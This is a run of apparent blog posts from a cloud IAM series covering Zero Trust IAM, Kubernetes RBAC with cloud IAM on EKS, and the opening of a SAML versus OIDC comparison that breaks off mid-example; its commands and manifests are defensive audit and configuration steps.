# Should see auditLogConfigs for cloudresourcemanager.googleapis.com and iam.googleapis.com
# with both DATA_READ and DATA_WRITE enabled

# Azure: route Entra ID logs to Log Analytics for long-term retention and querying
az monitor diagnostic-settings create \
  --name entra-audit-to-la \
  --resource "/tenants/TENANT_ID/providers/microsoft.aad/domains/company.com" \
  --logs '[{"category":"AuditLogs","enabled":true},{"category":"SignInLogs","enabled":true}]' \
  --workspace /subscriptions/SUB_ID/resourceGroups/rg-monitoring/providers/Microsoft.OperationalInsights/workspaces/security-logs

Framework Alignment

Zero Trust IAM isn’t a framework itself — it’s a design philosophy. But it maps cleanly onto the controls that compliance frameworks are pushing organizations toward:

| Framework Reference | What It Covers Here |
|---|---|
| CISSP Domain 5 — IAM | Zero Trust reframes IAM as continuous, context-aware verification rather than perimeter-based trust |
| CISSP Domain 1 — Security & Risk Management | Assume breach as a risk management posture; blast radius minimization through least privilege |
| CISSP Domain 7 — Security Operations | Continuous monitoring, anomaly detection, and automated response are operational requirements of Zero Trust |
| ISO 27001:2022 5.15 Access control | Zero Trust access policy: verify explicitly, least privilege, assume breach |
| ISO 27001:2022 8.16 Monitoring activities | Continuous session validation and universal audit trail — all authorization decisions logged |
| ISO 27001:2022 8.20 Networks security | Micro-segmentation and mTLS replace implicit network trust with verified identity at every hop |
| ISO 27001:2022 5.23 Information security for cloud services | Zero Trust architecture applied to cloud IAM across AWS, GCP, and Azure |
| SOC 2 CC6.1 | Zero Trust logical access controls — JIT, device posture, context-aware authorization |
| SOC 2 CC6.7 | Continuous session validation and transmission controls across all system components |
| SOC 2 CC7.1 | Threat detection through universal audit trails and anomaly-triggered automated response |
| SOC 2 CC7.2 | Incident response — automated revocation and session termination on anomaly detection |

Zero Trust Maturity — Where to Start

In practice, most organizations think about Zero Trust as a destination — a large, multi-year program. The reality is it’s a direction. Any movement in that direction reduces risk.

| Level | Where You Are | What to Build Next |
|---|---|---|
| 1 — Initial | Some MFA; static credentials for machines; no centralized IdP | Eliminate machine static keys → workload identity |
| 2 — Managed | Centralized IdP; SSO for most systems; some MFA enforcement | Close SSO gaps; enforce MFA everywhere; federate to cloud |
| 3 — Defined | Least privilege being enforced; audit tooling in use; JIT for some privileged access | Expand JIT; policy-as-code in CI/CD; quarterly access reviews |
| 4 — Contextual | Device posture in access decisions; conditional access policies | Continuous session evaluation; automated anomaly response |
| 5 — Optimizing | Policy-as-code everywhere; automated right-sizing; anomaly-triggered revocation | Refine and maintain — Zero Trust is never “done” |

The jump from Level 1 to Level 3 delivers the most security value per unit of effort. Start there. Don’t defer least privilege enforcement while you build a sophisticated device posture integration.


The Practical Sequence

If you’re building Zero Trust IAM from where most organizations are, this is the order that maximizes early security value:

  1. Inventory all identities — human and machine. You cannot secure what you can’t see. Build a complete picture before changing anything.

  2. Eliminate static credentials for machines — replace access keys and SA key files with workload identity. This is the highest-ROI change in most environments.

  3. Enforce MFA for all human access — especially cloud consoles, IdP admin, and VPN. Hardware keys for privileged accounts.

  4. Federate human identity — single IdP, SSO to cloud and major applications. Centralize the revocation path.

  5. Right-size IAM permissions — use last-accessed data and IAM Recommender to find and remove unused permissions. This is a continuous discipline, not a one-time clean-up.

  6. JIT for privileged access — Azure PIM, AWS Identity Center assignment automation, or equivalent for all elevated roles. No standing admin.

  7. IAM as code — all IAM changes via Terraform/Pulumi/CDK, reviewed in pull requests, validated by Access Analyzer or OPA in CI/CD, applied through automation.

  8. Continuous monitoring — alerts on IAM mutations, anomalous API call patterns, new cross-account trust relationships, new public resource exposures.

  9. Add context signals — Conditional Access policies incorporating device posture. Access Context Manager in GCP. AWS Verified Access for application access.

  10. Automated response — anomaly detected → automatic credential suspension or session termination. Close the window between detection and containment.
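As a sketch of how steps 1 and 2 connect: the static-credential worklist falls straight out of the identity inventory. This is a toy Python model — in practice the data would come from your IdP and cloud IAM APIs, and the field names here are hypothetical:

```python
# Toy identity inventory (step 1). Real entries would be pulled from the
# IdP, AWS IAM, GCP service accounts, etc. Field names are illustrative.
inventory = [
    {"name": "alice",      "type": "human",   "auth": "sso+mfa"},
    {"name": "deploy-bot", "type": "machine", "auth": "static-key"},
    {"name": "backup-sa",  "type": "machine", "auth": "workload-identity"},
]

# Step 2's worklist -- machines still holding static credentials --
# is a direct query over the inventory from step 1.
static_creds = [i["name"] for i in inventory
                if i["type"] == "machine" and i["auth"] == "static-key"]

print(static_creds)   # ['deploy-bot']
```

The point is the ordering: until the inventory exists, the remediation list cannot.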


Series Complete

This series covered Cloud IAM from the question “what even is IAM?” to Zero Trust architecture:

| Episode | Topic | The Core Lesson |
|---|---|---|
| EP01 | What is IAM? | Access management is deny-by-default; every grant is an explicit decision |
| EP02 | AuthN vs AuthZ | Two separate gates; passing one doesn’t open the other |
| EP03 | Roles, Policies, Permissions | Structure prevents drift; wildcards accumulate into exposure |
| EP04 | AWS IAM Deep Dive | Trust policies and permission policies are both required; the evaluation chain has six layers |
| EP05 | GCP IAM Deep Dive | Hierarchy inheritance is a feature that needs careful handling; service account keys are an antipattern |
| EP06 | Azure RBAC and Entra ID | Two separate authorization planes; managed identities are the right model for workloads |
| EP07 | Workload Identity | Static credentials for machines are solvable at the root; OIDC token exchange replaces them |
| EP08 | IAM Attack Paths | The attack chain runs through IAM; iam:PassRole and its equivalents are privilege escalation primitives |
| EP09 | Least Privilege Auditing | 5% utilization is the average; the 95% excess is attack surface — and it’s measurable |
| EP10 | Federation, OIDC, SAML | The IdP is the trust anchor; everything downstream is bounded by its security |
| EP11 | Kubernetes RBAC | Two separate IAM layers; both must be secured; cluster-admin is the first thing to audit |
| EP12 | Zero Trust IAM | Trust nothing implicitly; verify everything explicitly; minimize blast radius through least privilege at every layer |

IAM is not a feature you configure. It’s a practice you maintain. The organizations that operate with genuinely low cloud IAM risk don’t have fewer identities — they have better visibility into what those identities can do, and why, and what happened when something went wrong.

That’s what this series has been building toward.


The full series is at linuxcent.com/cloud-iam-series. If you found it useful, the best thing you can do is subscribe — the next series covers eBPF: what’s actually running in kernel space when Cilium, Falco, and Tetragon are doing their work.

Subscribe → linuxcent.com/subscribe

Kubernetes RBAC and AWS IAM: The Two-Layer Access Model for EKS

Reading Time: 9 minutes

Meta Description: Understand how Kubernetes RBAC and AWS IAM interact in EKS — map the two-layer access model and debug permission failures across both control planes.




TL;DR

  • Kubernetes RBAC and cloud IAM are separate authorization layers — strong cloud IAM with weak Kubernetes RBAC is still a vulnerable cluster
  • cluster-admin ClusterRoleBindings are the first thing to audit — a compromised pod with cluster-admin controls the entire cluster
  • Disable automountServiceAccountToken on pods that don’t call the Kubernetes API — most application pods don’t need it mounted
  • Use OIDC for human access instead of X.509 client certificates — client certs cannot be revoked without rotating the CA
  • Bind groups from IdP, not individual usernames — revocation propagates automatically when someone leaves
  • A ServiceAccount that can create pods or create rolebindings is a privilege escalation path: the same class of risk as iam:PassRole

The Big Picture

  TWO AUTHORIZATION LAYERS — NEITHER COMPENSATES FOR THE OTHER

  ┌─────────────────────────────────────────────────────────────────┐
  │  CLOUD IAM LAYER  (AWS IAM / GCP IAM / Azure RBAC)             │
  │  Controls: S3, DynamoDB, Lambda, RDS, cloud services           │
  │  Human: federated identity from IdP (SAML / OIDC)             │
  │  Machine: IRSA annotation → IAM role / GKE WI / AKS WI        │
  │  Audit: CloudTrail, GCP Audit Logs, Azure Monitor              │
  └─────────────────────────────────────────────────────────────────┘
           ↕ separate systems — no inheritance in either direction
  ┌─────────────────────────────────────────────────────────────────┐
  │  KUBERNETES RBAC LAYER  (within the cluster)                   │
  │  Controls: pods, secrets, deployments, configmaps, namespaces  │
  │  Human: OIDC groups → ClusterRoleBinding (or RoleBinding)      │
  │  Machine: ServiceAccount → Role / ClusterRole                  │
  │  Audit: kube-apiserver audit log                               │
  └─────────────────────────────────────────────────────────────────┘

  Attack path: exploit app pod → SA has cluster-admin → own the cluster
  Audit finding: cluster-admin on app SA, regardless of cloud IAM posture

Introduction

I spent a long time in Kubernetes environments assuming cloud IAM and Kubernetes RBAC were related closely enough that securing one partially covered the other. They aren’t. They’re separate authorization systems that happen to share infrastructure.

The moment this crystallized for me: I was auditing an EKS cluster for a fintech company. Their AWS IAM posture was actually quite good — least privilege roles, no wildcard policies, SCPs in place at the org level. I was about to give them a clean bill of health when I ran one command:

kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name=="cluster-admin") | {name:.metadata.name, subjects:.subjects}'

The output showed five ClusterRoleBindings to cluster-admin. Two of them bound it to service accounts in production namespaces. One of those service accounts was used by an application that processed customer transactions.

cluster-admin in Kubernetes is the equivalent of AdministratorAccess in AWS. An attacker who compromises a pod running as that service account doesn’t just have access to the application’s data. They have control of the entire cluster: reading every secret in every namespace, deploying arbitrary workloads, modifying RBAC bindings to create persistence.

None of this showed up in the AWS IAM audit. AWS IAM and Kubernetes RBAC are separate systems. Securing one tells you nothing about the other.


Kubernetes RBAC Architecture

Kubernetes RBAC works with four object types:

| Object | Scope | What It Does |
|---|---|---|
| Role | Single namespace | Defines permissions within one namespace |
| ClusterRole | Cluster-wide | Permissions across all namespaces, or for non-namespaced resources |
| RoleBinding | Single namespace | Binds a Role (or ClusterRole) to subjects, scoped to one namespace |
| ClusterRoleBinding | Cluster-wide | Binds a ClusterRole to subjects with cluster-wide scope |

Subjects — the identities that receive the binding — come in three kinds:

  • User: an external identity (Kubernetes has no native user objects; users come from the authenticator)
  • Group: a group of external identities
  • ServiceAccount: a Kubernetes-native machine identity, namespaced

The scoping matters. A ClusterRole defines what permissions exist. A RoleBinding applies that ClusterRole within a single namespace. A ClusterRoleBinding applies it everywhere. The same permissions, dramatically different blast radius.


Roles and ClusterRoles

# Role: read pods and their logs — scoped to the default namespace only
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""]          # "" = core API group (pods, secrets, configmaps, etc.)
  resources: ["pods", "pods/log"]
  verbs: ["get", "list", "watch"]
---
# ClusterRole: manage Deployments across all namespaces
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: deployment-manager
rules:
- apiGroups: ["apps"]
  resources: ["deployments", "replicasets"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]

The verbs map to HTTP methods against the Kubernetes API: get reads a specific resource, list returns a collection, watch streams changes, create/update/patch/delete are mutations.

One that consistently surprises people: list on secrets returns the full Secret objects, data included — not just names and metadata. If a service account only needs to read or confirm the existence of one secret, grant get restricted to that secret’s name via resourceNames. Avoid list on the secrets resource.
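To make the rule semantics concrete, here is a simplified Python model of how a rule with resourceNames narrows access to one named secret. This is an illustration only — the real authorizer lives in kube-apiserver — and the secret name is hypothetical:

```python
# Simplified model of RBAC rule matching, including resourceNames.
# Not the real kube-apiserver authorizer -- an illustration of semantics.

def rule_allows(rule, verb, resource, name=None):
    """Return True if a single RBAC rule permits (verb, resource, name)."""
    if verb not in rule["verbs"] and "*" not in rule["verbs"]:
        return False
    if resource not in rule["resources"] and "*" not in rule["resources"]:
        return False
    # resourceNames narrows the rule to specific objects; an absent or
    # empty list means "all objects of this resource type".
    names = rule.get("resourceNames", [])
    if names and name not in names:
        return False
    return True

# A Role that can read ONE named secret -- far safer than list on all secrets
db_creds_rule = {
    "verbs": ["get"],
    "resources": ["secrets"],
    "resourceNames": ["db-credentials"],   # hypothetical secret name
}

print(rule_allows(db_creds_rule, "get", "secrets", "db-credentials"))  # True
print(rule_allows(db_creds_rule, "get", "secrets", "other-secret"))    # False
print(rule_allows(db_creds_rule, "list", "secrets"))                   # False
```

The third check is the one that matters: even a rule scoped this tightly never grants list, so a compromised pod cannot enumerate the namespace’s secrets.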

The Wildcard Risk

# This is effectively cluster-admin in the default namespace — avoid
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]

Any * in RBAC rules is an audit finding. In practice I find wildcards most often in:
– Operator and controller service accounts (understandable, but worth reviewing)
– “Temporary” RBAC that became permanent
– Developer tooling given cluster-admin “because it was easier”

Run this to find all ClusterRoles with wildcard verbs:

kubectl get clusterroles -o json | \
  jq '.items[] | select(.rules[]?.verbs[]? == "*") | .metadata.name'

Bindings — Connecting Identities to Roles

# RoleBinding: alice can read pods in the default namespace
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: alice-pod-reader
  namespace: default
subjects:
- kind: User
  name: [email protected]
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io
---
# ClusterRoleBinding: Prometheus can read cluster-wide (monitoring use case)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: prometheus-cluster-reader
subjects:
- kind: ServiceAccount
  name: prometheus
  namespace: monitoring
roleRef:
  kind: ClusterRole
  name: view
  apiGroup: rbac.authorization.k8s.io

An important pattern: a RoleBinding can reference a ClusterRole. This lets you define a role once at the cluster level (the ClusterRole) and bind it within specific namespaces through RoleBindings. The permissions are still scoped to the namespace where the RoleBinding lives. This is the right pattern for shared role definitions — define the permission set once, instantiate it with appropriate scope.

Default to RoleBinding over ClusterRoleBinding for namespace-scoped work. ClusterRoleBinding should be reserved for genuinely cluster-wide operations: monitoring agents, network plugins, cluster operators, security tooling.
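The blast-radius difference can be sketched as a toy evaluator: the same role reference, bound two ways. The subject and role names here are hypothetical and the semantics deliberately simplified:

```python
# Toy model: the SAME ClusterRole bound two ways. A RoleBinding confines it
# to one namespace; a ClusterRoleBinding grants it everywhere.
# Hypothetical names; simplified binding semantics for illustration.

def is_allowed(bindings, subject, namespace):
    """Does any binding grant `subject` the bound role's permissions in `namespace`?"""
    for b in bindings:
        if subject not in b["subjects"]:
            continue
        if b["kind"] == "ClusterRoleBinding":
            return True                       # cluster-wide: every namespace
        if b["kind"] == "RoleBinding" and b["namespace"] == namespace:
            return True                       # scoped to the binding's namespace
    return False

bindings = [
    # deployment-manager ClusterRole, instantiated only in "staging"
    {"kind": "RoleBinding", "namespace": "staging",
     "roleRef": "deployment-manager", "subjects": ["alice"]},
    # the same ClusterRole bound cluster-wide -- much larger blast radius
    {"kind": "ClusterRoleBinding",
     "roleRef": "deployment-manager", "subjects": ["ci-bot"]},
]

print(is_allowed(bindings, "alice", "staging"))      # True
print(is_allowed(bindings, "alice", "production"))   # False
print(is_allowed(bindings, "ci-bot", "production"))  # True
```

Same role definition, same verbs — the binding kind alone decides whether a compromise of ci-bot reaches production.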


Service Accounts — The Machine Identity in Kubernetes

Every pod in Kubernetes runs as a service account. If you don’t specify one, it uses the default service account in the pod’s namespace.

The default service account is where many RBAC misconfigurations accumulate. When someone creates a RoleBinding without thinking about which SA to use, they often bind the permission to default. Now every pod in that namespace that doesn’t explicitly set a service account — including pods deployed by developers who aren’t thinking about RBAC — inherits that binding.

# Create a dedicated SA for each application
kubectl create serviceaccount app-backend -n production

# Check what any SA can currently do — use this in every audit
kubectl auth can-i --list --as=system:serviceaccount:production:app-backend -n production

# Check a specific action
kubectl auth can-i get secrets \
  --as=system:serviceaccount:production:app-backend -n production

kubectl auth can-i create pods \
  --as=system:serviceaccount:production:app-backend -n production

Disable Auto-Mounting the SA Token

By default, Kubernetes mounts the service account token into every pod at /var/run/secrets/kubernetes.io/serviceaccount/token. A pod that doesn’t need to call the Kubernetes API doesn’t need this token. Having it mounted increases the blast radius if the pod is compromised — the token can be used to call the K8s API with whatever RBAC permissions the SA has.

# Disable at the pod level
apiVersion: v1
kind: Pod
spec:
  automountServiceAccountToken: false
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest

---
# Or at the service account level (applies to all pods using this SA)
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
automountServiceAccountToken: false

For most application pods — anything that isn’t a Kubernetes operator, controller, or management tool — the K8s API token is unnecessary. Disable it.


Human Access to Kubernetes — Get Off Client Certificates

Kubernetes doesn’t manage human users natively. Authentication is delegated to an external mechanism. The most common approaches:

| Method | Notes |
|---|---|
| X.509 client certificates | Common for initial cluster setup; credentials are embedded in kubeconfig; cannot be revoked without rotating the CA |
| Static bearer tokens | Long-lived; avoid |
| OIDC via external IdP | Preferred for human access — supports SSO, MFA, and revocation via the IdP |
| Webhook authentication | Flexible, but requires custom infrastructure |

X.509 certificates are the bootstrap pattern. Every managed Kubernetes offering generates an admin kubeconfig with a client certificate. The problem: you can’t revoke individual certificates without rotating the CA. If you’re giving human engineers access via client certificates, someone leaving doesn’t actually lose cluster access until the certificate expires.

OIDC is the right model. Configure the kube-apiserver to accept JWTs from your IdP, bind RBAC permissions to groups from the IdP, and revocation becomes “remove from IdP group” rather than “hope the certificate expires soon”:

# kube-apiserver flags for OIDC (managed clusters configure this via provider settings)
--oidc-issuer-url=https://accounts.google.com
--oidc-client-id=my-cluster-client-id
--oidc-username-claim=email
--oidc-groups-claim=groups
--oidc-groups-prefix=oidc:
# User's kubeconfig — uses an exec plugin to fetch an OIDC token
users:
- name: alice
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: kubectl-oidc-login
      args:
        - get-token
        - --oidc-issuer-url=https://dex.company.com
        - --oidc-client-id=kubernetes

With managed clusters:

# EKS: add IAM role as a cluster access entry (replaces the aws-auth ConfigMap)
aws eks create-access-entry \
  --cluster-name my-cluster \
  --principal-arn arn:aws:iam::123456789012:role/DevTeamRole \
  --type STANDARD

aws eks associate-access-policy \
  --cluster-name my-cluster \
  --principal-arn arn:aws:iam::123456789012:role/DevTeamRole \
  --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy \
  --access-scope type=namespace,namespaces=production,staging

# GKE: get credentials; IAM roles map to cluster permissions
gcloud container clusters get-credentials my-cluster --region us-central1
# roles/container.developer → edit permissions
# But: use ClusterRoleBindings for fine-grained control rather than relying on GCP IAM roles

# AKS: bind Entra ID groups to Kubernetes RBAC
az aks get-credentials --name my-aks --resource-group rg-prod
kubectl create clusterrolebinding dev-team-view \
  --clusterrole=view \
  --group=ENTRA_GROUP_OBJECT_ID

Cloud IAM + Kubernetes RBAC: The Integration Points

EKS Pod Identity / IRSA (revisited)

The annotation on the Kubernetes ServiceAccount is the bridge:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/AppBackendRole

Kubernetes RBAC controls what the pod can do inside the cluster. The IAM role controls what the pod can do in AWS. Both must be explicitly granted; neither inherits from the other.
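A minimal sketch of that two-layer rule: each question is answered by a different system against a different grant set, and neither consults the other. The permission sets below are hypothetical:

```python
# Toy model of the two independent authorization layers for one pod.
# Hypothetical grants; real evaluation happens in AWS IAM and kube-apiserver.
iam_role_allows = {"s3:GetObject", "dynamodb:Query"}        # from the IAM role (IRSA)
k8s_rbac_allows = {("get", "configmaps"), ("get", "pods")}  # from the SA's Role

def pod_can_call_aws(action):
    return action in iam_role_allows            # cloud IAM layer only

def pod_can_call_k8s(verb, resource):
    return (verb, resource) in k8s_rbac_allows  # RBAC layer only

print(pod_can_call_aws("s3:GetObject"))    # True  -- granted by the IAM role
print(pod_can_call_k8s("get", "secrets"))  # False -- no inheritance from IAM
```

A broad IAM role never widens the pod’s cluster permissions, and a broad RBAC grant never widens its AWS permissions — each layer must be audited on its own.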

GKE Workload Identity

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: [email protected]

AKS Workload Identity

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "MANAGED_IDENTITY_CLIENT_ID"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"
spec:
  serviceAccountName: app-backend

RBAC Audit — What to Check First

# Start here: who has cluster-admin?
kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name=="cluster-admin") | 
      {binding: .metadata.name, subjects: .subjects}'
# cluster-admin should bind to almost nobody — review every result

# Find ClusterRoles with wildcard permissions
kubectl get clusterroles -o json | \
  jq '.items[] | select(.rules[]?.verbs[]? == "*") | .metadata.name'

# What can the default SA do in each namespace?
for ns in $(kubectl get namespaces -o name | cut -d/ -f2); do
  echo "=== $ns ==="
  kubectl auth can-i --list --as=system:serviceaccount:${ns}:default -n ${ns} 2>/dev/null \
    | head -10   # --list prints only what IS allowed; non-trivial output here is a finding
done

# What can a specific SA do?
kubectl auth can-i --list \
  --as=system:serviceaccount:production:app-backend \
  -n production

# Check whether an SA can escalate — key risk indicators
kubectl auth can-i get secrets -n production \
  --as=system:serviceaccount:production:app-backend
kubectl auth can-i create pods -n production \
  --as=system:serviceaccount:production:app-backend
kubectl auth can-i create rolebindings -n production \
  --as=system:serviceaccount:production:app-backend

Creating pods and creating rolebindings are privilege escalation primitives. A service account that can create pods can run a pod with a different, more powerful SA. A service account that can create rolebindings can grant itself more permissions.
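An audit for these primitives can be automated over the JSON that kubectl get roles,clusterroles -o json returns. A simplified Python sketch — the role name is hypothetical and the matching is reduced to the essentials:

```python
# Flag escalation primitives in RBAC rules (shape mirrors
# `kubectl get clusterroles -o json` items). Simplified matching.

ESCALATION = {("create", "pods"), ("create", "rolebindings"),
              ("create", "clusterrolebindings")}

def escalation_findings(role):
    """Return (role, verb, resource) tuples that are escalation paths."""
    findings = []
    for rule in role.get("rules", []):
        for verb in rule.get("verbs", []):
            for res in rule.get("resources", []):
                if (verb, res) in ESCALATION or verb == "*" or res == "*":
                    findings.append((role["metadata"]["name"], verb, res))
    return findings

# Hypothetical role: looks like harmless CI tooling, but create-pods
# lets it launch a pod under any more powerful SA in the namespace.
ci_role = {"metadata": {"name": "ci-deployer"},
           "rules": [{"verbs": ["get", "list", "create"],
                      "resources": ["pods"]}]}

print(escalation_findings(ci_role))   # [('ci-deployer', 'create', 'pods')]
```

Run the same check over every Role and ClusterRole in the cluster; anything flagged on a non-privileged service account deserves a justification or a removal.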

Useful Tools

# rbac-tool — visualize and analyze RBAC (install: kubectl krew install rbac-tool)
kubectl rbac-tool viz                              # generate a graph of all bindings
kubectl rbac-tool who-can get secrets -n production
kubectl rbac-tool lookup [email protected]

# rakkess — access matrix for a subject
kubectl rakkess --sa production:app-backend

# audit2rbac — generate minimal RBAC from audit logs
audit2rbac --filename /var/log/kubernetes/audit.log \
  --serviceaccount production:app-backend

Common RBAC Misconfigurations

| Misconfiguration | Risk | Fix |
|---|---|---|
| cluster-admin bound to application SA | Full cluster takeover from compromised pod | Minimal ClusterRole; scope to namespace where possible |
| list or wildcard on secrets | Read all secrets in scope — includes credentials, API keys | Grant get on specific named secrets only |
| default SA with non-trivial permissions | Every pod in the namespace inherits the permission | Bind permissions to dedicated SAs; automountServiceAccountToken: false on default |
| ClusterRoleBinding for namespace-scoped work | Namespace work with cluster-wide permission | Always prefer RoleBinding; ClusterRoleBinding only for genuinely cluster-wide needs |
| Binding users by username string | Hard to revoke; doesn’t sync with IdP | Bind groups from IdP; revocation propagates through group membership |
| SA can create pods or create rolebindings | Privilege escalation path | Audit and remove these from non-privileged SAs |

Framework Alignment

| Framework Reference | What It Covers Here |
|---|---|
| CISSP Domain 5 — Identity and Access Management | Kubernetes RBAC operates as a full IAM system at the platform layer, independent of cloud IAM |
| CISSP Domain 3 — Security Architecture | Two independent authorization layers (cloud + K8s) must each be designed and audited — one does not compensate for the other |
| ISO 27001:2022 5.15 Access control | Kubernetes RBAC Roles, ClusterRoles, and bindings implement access control within the container platform |
| ISO 27001:2022 5.18 Access rights | Service account provisioning, OIDC-based human access, and workload identity integration with cloud IAM |
| ISO 27001:2022 8.2 Privileged access rights | cluster-admin and wildcard RBAC bindings represent the highest-privilege grants in Kubernetes |
| SOC 2 CC6.1 | Kubernetes RBAC is the logical access control mechanism for the container platform layer |
| SOC 2 CC6.3 | Binding revocation, SA token disabling, and OIDC group-based access removal satisfy CC6.3 requirements |

Key Takeaways

  • Kubernetes RBAC and cloud IAM are separate authorization layers — both must be secured; strong cloud IAM with weak K8s RBAC is still a vulnerable cluster
  • cluster-admin bindings are the first thing to audit in any cluster — the blast radius of a compromised pod with cluster-admin is the entire cluster
  • Disable automountServiceAccountToken on service accounts and pods that don’t call the Kubernetes API — most application pods don’t need it
  • Use OIDC for human access rather than client certificates; revocation via IdP is instant and reliable
  • Bind groups from IdP rather than individual usernames; revocation propagates automatically when someone leaves
  • A service account that can create pods or create rolebindings is a privilege escalation path — audit for these in every namespace

What’s Next

EP12 is the capstone: Zero Trust IAM — how all the concepts in this series come together into an architecture that assumes nothing is implicitly trusted, verifies everything explicitly, and limits blast radius through least privilege enforced at every layer.

Next: Zero trust access in the cloud

Get EP12 in your inbox when it publishes → linuxcent.com/subscribe

SAML vs OIDC: Which Federation Protocol Belongs in Your Cloud?

Reading Time: 10 minutes

Meta Description: Choose between SAML vs OIDC federation for your cloud — understand token formats, trust flows, and which protocol fits your IdP and workload mix.




TL;DR

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t manage them independently
  • SAML is XML-based, browser-oriented, the enterprise standard; OIDC is JWT-based, API-native, the modern protocol for workload identity and consumer SSO
  • In OIDC trust policies, the sub condition is the security boundary — omitting it means any GitHub Actions workflow in any repository can assume your role
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but need correct configuration (especially aud)
  • The IdP is the trust anchor: compromise the IdP and every downstream system is compromised. Treat IdP admin access with the same controls as your most sensitive system.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

The Big Picture

  FEDERATION: HOW TRUST FLOWS FROM IdP TO DOWNSTREAM SYSTEMS

  Identity Provider  (Okta / Entra ID / Google / AD FS)
  ┌──────────────────────────────────────────────────────────────────┐
  │  User or workload authenticates → IdP issues signed assertion   │
  │                                                                  │
  │  ┌──────────────────────────┐  ┌───────────────────────────┐   │
  │  │  SAML Assertion (XML)    │  │  OIDC ID Token (JWT)       │   │
  │  │  RSA-signed, 5–10 min    │  │  RS256-signed, ~1 hr      │   │
  │  │  Audience: SP entity ID  │  │  aud: client ID           │   │
  │  │  Subject: user identity  │  │  sub: specific workload   │   │
  │  └───────────┬──────────────┘  └──────────┬────────────────┘   │
  └─────────────────────────────────────────────────────────────────┘
                 │  human SSO                  │  workload identity
                 ▼                             ▼
  ┌─────────────────────────┐  ┌───────────────────────────────────┐
  │ SP validates signature  │  │ AWS STS / GCP STS validates       │
  │ + audience + timestamp  │  │ signature + iss + aud + sub       │
  │ → console session       │  │ → AssumeRoleWithWebIdentity       │
  └─────────────────────────┘  └───────────────────────────────────┘

  Security bound: IdP security bounds every system that trusts it
  Disable in Okta → access revoked everywhere that trusts Okta

Introduction

Before federation existed, every system had its own user database. Your Jira account. Your AWS account. Your Salesforce account. Your internal wiki. Each one had its own password, its own MFA, its own offboarding process. When an engineer joined, someone had to create accounts in every system. When they left, you hoped whoever processed the offboarding remembered to deactivate all of them.

I’ve done that audit — the one where you’re trying to figure out if a former employee still has access to anything. You go system by system, cross-reference against HR records, find accounts that exist in places you’ve forgotten the company even uses. In one environment I found an ex-engineer’s account still active in a vendor portal six months after they left, because that system was set up by someone who had since also left the company, and nobody had documented it.

Federation solves this structurally. One identity provider. One place to authenticate. One place to revoke. Every downstream system trusts the IdP’s assertion rather than managing credentials independently. Disable someone in Okta and they lose access everywhere that trusts Okta — immediately, without a checklist.

This episode is how federation actually works at the protocol level, because understanding the mechanism is what lets you design it securely. A federation setup with a trust policy that accepts assertions from any OIDC issuer is worse than no federation — it’s a false sense of security.


The Federation Model

Identity Provider (IdP)          Service Provider (SP) / Relying Party
  (Okta, Google, AD FS, Entra ID)       (AWS, Salesforce, GitHub, your app)
         │                                          │
         │  1. User authenticates to IdP             │
         │     (password + MFA)                      │
         │                                          │
         │  2. IdP generates a signed assertion      │
         │     (SAML response or OIDC ID Token)      │
         │ ──────────────────────────────────────── ▶│
         │                                          │
         │  3. SP validates the signature            │
         │     (using IdP's public certificate       │
         │      or JWKS endpoint)                    │
         │  4. SP maps identity to local permissions │
         │  5. SP grants access                      │

The SP never sees the user’s password. It never has one. It trusts the IdP’s cryptographic signature — if the assertion is signed with the IdP’s private key, and the SP trusts that key, the identity is accepted.

This trust chain has one critical property: the security of every SP is bounded by the security of the IdP. Compromise the IdP, and every system that trusts it is compromised. This is why IdP security deserves the same attention as the most sensitive system it gates access to.


SAML 2.0 — The Enterprise Standard

SAML (Security Assertion Markup Language) is XML-based, verbose, and battle-tested. Published in 2005, it’s the protocol behind most enterprise SSO deployments. When your company says “use your corporate login for this vendor app,” SAML is usually the mechanism.

How a SAML Login Flows

1. User visits AWS console (the Service Provider)
2. AWS checks: no active session → redirect to IdP
   → https://company.okta.com/saml?SAMLRequest=...
3. Okta authenticates the user (password, MFA)
4. Okta generates a SAML Assertion — a signed XML document containing:
   - Who the user is (Subject, typically email)
   - Their attributes (group memberships, custom attributes)
   - When the assertion was issued and when it expires (valid 5-10 minutes typically)
   - Which SP this is for (Audience restriction)
   - Okta's digital signature (RSA-SHA256 or similar)
5. Browser POSTs the assertion to AWS's ACS (Assertion Consumer Service) URL
6. AWS validates the signature against Okta's public cert (retrieved from Okta's metadata URL)
7. AWS reads the SAML attribute for the IAM role
8. AWS calls sts:AssumeRoleWithSAML → issues temporary credentials
9. User gets a console session — no AWS credentials were ever stored anywhere

What a SAML Assertion Actually Looks Like

<saml:Assertion>
  <saml:Issuer>https://okta.company.com</saml:Issuer>

  <saml:Subject>
    <saml:NameID>[email protected]</saml:NameID>
  </saml:Subject>

  <saml:AttributeStatement>
    <!-- This attribute tells AWS which IAM role to assume -->
    <saml:Attribute Name="https://aws.amazon.com/SAML/Attributes/Role">
